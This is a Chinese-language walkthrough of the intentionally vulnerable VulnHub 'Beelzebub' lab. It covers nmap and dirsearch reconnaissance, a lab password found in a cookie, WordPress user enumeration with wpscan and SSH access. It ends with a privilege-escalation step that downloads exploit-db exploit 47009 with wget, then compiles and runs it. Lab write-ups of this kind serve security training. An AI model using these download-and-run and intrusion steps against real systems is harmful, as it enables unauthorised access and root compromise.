当前位置: 首页 > news >正文

vuhub Beelzebub靶场攻略

靶场下载:

下载地址:https://download.vulnhub.com/beelzebub/Beelzebub.zip

靶场攻略:

主机发现:

nmap 192.168.163.1/24

端口扫描:

nmap -p-65535 -A 192.168.163.152

发现没有额外端口。

页面扫描:

dirsearch -u http://192.168.163.152/

挨个登录一下扫到的页面,就两个有用的:

phpinfo.php

/index.php/login/

右键查看源代码

他说把beelzebub进行base64解码

解码出来时一串字符,看别的攻略是要我们拼接到路径后面,然后进行页面扫描

dirsearch -u http://192.168.163.152/d18e1e22becbd915b45e0e655429d487

我们发现这是一个wordpress的cms框架,挨个访问一下扫到的页面:其中有用的有

发现了一个留言板:

F12查看cookie找到了password为M4k3Ad3a1

扫描wordpress漏洞

有密码,但是没账号,账号到哪里找呢?

我们结合之前的信息,这是一个wordpress的cms框架,那么我们可以试着扫描一下有没有框架漏洞。工具webscan

wpscan --url=http://192.168.251.229/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force  -e --plugins-detection aggressive

扫描出来了两个账号。

挨个试一下,登录ssh,成功登录:

history查看历史命令

发现其中有前辈们提权的步骤,那太好了,我们照着做就行了

wget https://www.exploit-db.com/download/47009
 mv 47009 ./exploit.c
 gcc exploit.c -o exploit
 ./exploit

http://www.lryc.cn/news/615709.html

相关文章:

  • 智能体革命:网络安全人的角色重塑与突围指南
  • 医学统计(随机对照研究分类变量结局数据的统计策略2)
  • 用 ES|QL 做搜索从过滤到相关性、再到语义与混合检索
  • WPFC#超市管理系统(5)商品布局、顾客登录、商品下单
  • 机器学习实战·第三章 分类(1)
  • Deep Learning MNIST手写数字识别 Mac
  • 【Elasticsearch入门到落地】16、RestClient查询文档-快速入门
  • Lua的数组、迭代器、table、模块
  • 黑马SpringBoot+Elasticsearch作业2实战:商品搜索与竞价排名功能实现
  • sqli-labs-master/Less-51~Less-61
  • Lua语言变量、函数、运算符、循环
  • 【RocketMQ 生产者和消费者】- ConsumeMessageOrderlyService 顺序消费消息
  • 在windows安装colmap并在cmd调用
  • vue3前端项目cursor rule
  • 常用hook钩子函数
  • 海关 瑞数 失信企业 逆向 分析 后缀 rs
  • 从神经网络语言模型(NNLM)到Word2Vec:自然语言处理中的词向量学习
  • 【Html网页模板】炫酷科技风公司首页
  • Axure设计下的智慧社区数据可视化大屏:科技赋能社区管理
  • [0CTF 2016]piapiapia
  • PhotoDirector 安卓版:功能强大的照片编辑与美化应用
  • Dify集成 Echarts 实现智能数据报表集成与展示实战详解
  • 复杂项目即时通讯从android 5升级android x后遗症之解决 ANR: Input dispatching timed out 问题 -优雅草卓伊凡
  • 咪咕MGV3200-KLH_GK6323V100C_板号E503744_安卓9_短接强刷包-可救砖
  • WebAssembly技术详解:从浏览器到云原生的高性能革命
  • Flutter 与 Android NDK 集成实战:实现高性能原生功能
  • Vue3 组件化开发
  • Solana上Launchpad混战:新颖性应被重视
  • 一个“加锁无效“的诡异现象
  • BGP 笔记